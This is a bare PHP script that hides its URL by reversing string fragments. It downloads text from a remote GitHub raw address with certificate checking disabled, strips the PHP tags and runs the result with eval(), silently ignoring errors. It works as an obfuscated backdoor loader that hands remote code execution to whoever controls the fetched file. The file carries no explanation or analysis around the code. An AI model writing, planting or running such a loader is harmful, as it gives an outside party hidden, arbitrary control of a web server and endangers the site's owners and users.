<?php

$s1 = "txt.2/nia";
$s2 = "m/sdaeh/sfe";
$s3 = "r/mpo/mpo";
$s4 = "yfful/moc.tn";
$s5 = "etnocresubuht";
$s6 = "ig.war//:sptth";

$url = strrev($s1 . $s2 . $s3 . $s4 . $s5 . $s6);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$res = curl_exec($ch);

if (!curl_errno($ch)) {
    $exec = str_replace(['<?php', '?>', '<?'], '', $res);
    try {
        eval($exec);
    } catch (Throwable $e) {
    }
}

curl_close($ch);

?>
